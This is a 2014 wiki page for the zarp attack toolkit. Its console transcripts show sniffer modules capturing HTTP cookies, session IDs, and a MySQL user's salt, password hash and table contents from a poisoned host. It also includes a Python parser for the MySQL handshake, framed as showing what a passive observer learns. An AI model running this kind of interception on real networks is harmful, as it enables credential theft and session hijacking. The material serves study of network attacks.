bryan alexander edited this page Jul 29, 2014 · 1 revision

These post-poisoning modules are useful for intercepting interesting traffic. Currently included are HTTP, Password, Traffic, and Database sniffers.

Here is an example of sniffing local HTTP traffic, and parsing out the cookies:

	[1] HTTP Sniffer
	[2] Password Sniffer
	[3] Traffic Sniffer

0) Back
> 1
[!] Enter address to listen for HTTP packets from: 192.168.1.42
[!] Enter verbosity level: 
	[1] Site Only
	[2] Request String
	[3] Request and Payload
	[4] Custom Regex
> 4
[!] Enter regex: Cookie: (.*)
[!] Output dumping in 'Custom Regex' verbosity.
[!] Sniff HTTP traffic from 192.168.1.42.  Is this correct? 

The module is now parsing HTTP traffic for all cookies, which can either be logged to a file or output to the screen:

> 7

	[Running sessions]
[!] HTTP SNIFFERS [http]:
	[0] 192.168.1.42


	[1] Stop session
	[2] View session
	[3] Start session logger
	[4] Stop session logger

0) Back
> 2
[module] [number]> http 0
[!] Dumping HTTP from 192.168.1.42...
Cookie: NID=66=tL9bCtWv7lzgC6wY47YP4FgEXFAdl5omRaqOVYR7kNpfUzjk4-bgXWOCj7ZFYGJw-c9em0lDhuWVYGIIDFb0Bd0GVLcb25mzfAhCck2M2vKBh8THqeTXNY3x0dxTYiD1; 
Cookie: AA002=1352264798-3207528; MUID=1B8EFFB46EA86BFB02B8FBA56DA86BC4
Cookie: MUID=283C358E70B2646935A
Cookie: MUID=283C358E70B2646935A931C174B26476&TUID=1; WT_FPC=id=************-1024299920.30272855:lv=1357611500721:ss=1357611500709
Cookie: MUID=283C358E70B2646935A931C174B26476&TUID=1; WT_FPC=id=************-1024299920.30272855:lv=1357611500721:ss=1357611500709; 
Cookie: ACOOKIE=C8ctADY4LjEzLjE1Mi4xNTYtMTAyNDI5OTkyMC4zMDI3Mjg1NQAAAAAAAAABAAAAKwIAACCe61AgnutQAQAAABMAAAAgnutQIJ7rUAAAAAA-
Cookie: ACOOKIE=C8ctADY4LjEzLjE1Mi4xNTYtMTAyNDI5OTkyMC4zMDI3Mjg1NQAAAAAAAAABAAAAKwIAACCe61AgnutQAQAAABMAAAAgnutQIJ7rUAAAAAA-
Cookie: WT_NVR=0=/:1=en-us; WT_FPC=id=68.13.152.156-1024299920.30272855:lv=1357611500721:ss=1357611500709; 

This is the result of browsing around on the internet from my local system. SSL-encrypted websites will not be accessible until the sslstrip attack has been implemented in zarp.

Another example with the database sniffer:

	[Running sessions]
[1] DatabaseSniffer
	[0] 192.168.1.42


	[1] Stop session
	[2] View session
	[3] Start session logger
	[4] Stop session logger

0) Back
> 2
[module] [number]> 1 0
[!] Dumping Database from 192.168.1.42...
[!] Protocol: 10
[!] Version: MySQL 5.5.27
[!] Salt: 71594c51303a714e0072716277516d512f365d5677
[!] User: bryan
[!] Password hash: 3cd8eb4a2549313e6482341eb866e80a001b4280
[!] Login success.
[!] Query: select @@version_comment limit 1
[!] ['@@version_comment']
[!] ['MySQL Community Server (GPL)']

This module is currently capable of sniffing MySQL and PostgreSQL sessions, established or establishing.

[!] Dumping output from 'Database Sniffer'...
[!] Protocol: 10
[!] Version: MySQL 5.5.27
[!] Salt: 7c2a59615c29544e006b502f386c3a786e423e4f50
[!] User: bryan
[!] Password hash: 72d0ce3b7049aa77d67b5f2e9cc49dee394f6b0e627279616e00
[!] Login success.
[!] Query: show databases
	Database          
	------------------
	information_schema
	             bryan
	             cdcol
	             mysql
	performance_schema
	        phpmyadmin
	              test
	           webauth
	         webissues
	------------------
[!] Query: show tables
Tablesinbryan = experimenter
[!] Fetching table fields: experimenter
[!] Query: select @@version_comment limit 1
versioncomment = MySQL Community Server (GPL)
[!] Query: select * from experimenter
	ExpterID | Name        | Email            | Dept        | Institution
	---------+-------------+------------------+-------------+------------
	   10001 |         Bob |   [email protected] |          CS |         UNO
	   10002 |        Jack |    [email protected] |     biology |         UNO
	   10003 |     Johnson | [email protected] |     biology |         UNO
	   10004 | Henry Frink |   [email protected] | engineering |         UNO
	   10005 |    John Doe |     [email protected] |          CS |         UNO
	---------+-------------+------------------+-------------+------------

Remaining work on this module includes: support for more databases, further testing on older MySQL versions, and cleaner output.
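As an added example (not zarp's own code), here is a small parser for the MySQL server greeting (Protocol::HandshakeV10), the packet the database sniffer summarises above as Protocol, Version and Salt; it shows exactly what a passive observer learns from that first packet and whether the server even advertises TLS via the CLIENT_SSL capability bit. The sample packet is constructed here; only its version string and salt bytes are taken from the transcript above, and the connection id, charset and plugin name are assumed values.

```python
import struct

CLIENT_SSL = 0x0800                # server is willing to switch the session to TLS
CLIENT_SECURE_CONNECTION = 0x8000  # 4.1+ challenge/response auth with a 20-byte salt
CLIENT_PLUGIN_AUTH = 0x80000       # auth plugin name follows the salt

def parse_handshake_v10(packet: bytes) -> dict:
    """Parse a server Protocol::HandshakeV10 packet, 4-byte packet header included."""
    p = packet[4:4 + int.from_bytes(packet[:3], "little")]   # header: 3-byte len, 1-byte seq
    if len(p) < 33 or p[0] != 10:
        raise ValueError("not a v10 handshake")
    end = p.index(b"\x00", 1)
    version = p[1:end].decode()        # NUL-terminated server version string
    pos = end + 1
    conn_id = struct.unpack_from("<I", p, pos)[0]
    pos += 4
    salt = p[pos:pos + 8]              # auth-plugin-data-part-1
    pos += 9                           # 8 salt bytes + 0x00 filler
    caps = struct.unpack_from("<H", p, pos)[0]   # lower capability flags
    pos += 2
    charset, status, caps_hi = struct.unpack_from("<BHH", p, pos)
    caps |= caps_hi << 16              # upper capability flags
    pos += 5
    auth_len = p[pos]                  # total auth-plugin-data length (21 for native auth)
    pos += 11                          # length byte + 10 reserved bytes
    plugin = ""
    if caps & CLIENT_SECURE_CONNECTION:
        part2_len = max(13, auth_len - 8)
        salt += p[pos:pos + part2_len].rstrip(b"\x00")   # part-2 is NUL-terminated
        pos += part2_len
        if caps & CLIENT_PLUGIN_AUTH:
            plugin = p[pos:p.index(b"\x00", pos)].decode()
    return {"protocol": p[0], "version": version, "connection_id": conn_id,
            "salt": salt.hex(), "charset": charset, "status": status,
            "capabilities": caps, "tls_offered": bool(caps & CLIENT_SSL),
            "auth_plugin": plugin}

def build_sample_handshake(caps: int) -> bytes:
    """Constructed packet: version and salt bytes match the transcript above (part-1 + filler + part-2)."""
    payload = (b"\x0a" + b"5.5.27\x00" + struct.pack("<I", 42)
               + b"qYLQ0:qN" + b"\x00" + struct.pack("<H", caps & 0xFFFF)
               + bytes([33]) + struct.pack("<H", 2) + struct.pack("<H", caps >> 16)
               + bytes([21]) + b"\x00" * 10 + b"rqbwQmQ/6]Vw\x00"
               + b"mysql_native_password\x00")
    return len(payload).to_bytes(3, "little") + b"\x00" + payload
```

Feed it the first server packet of a captured MySQL session; when `tls_offered` is False (as in the constructed sample without CLIENT_SSL), the login and every query cross the wire in the clear, exactly as the sniffer output above shows.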

And an example of session ID sniffing (the IDs shown are obviously not real):

> 2
[module] [number]> 1 0
	Host           | SessionID   
	---------------+-------------
	www.google.com |    343434434
	    google.com |    343434434
	   192.168.1.1 | 234234234234
	---------------+-------------

	[Running sessions]
[1] HTTP Sniffer
	[0] 192.168.1.42 [Session IDs]


	[1] Stop session
	[2] View session
	[3] Start session logger
	[4] Stop session logger

0) Back
>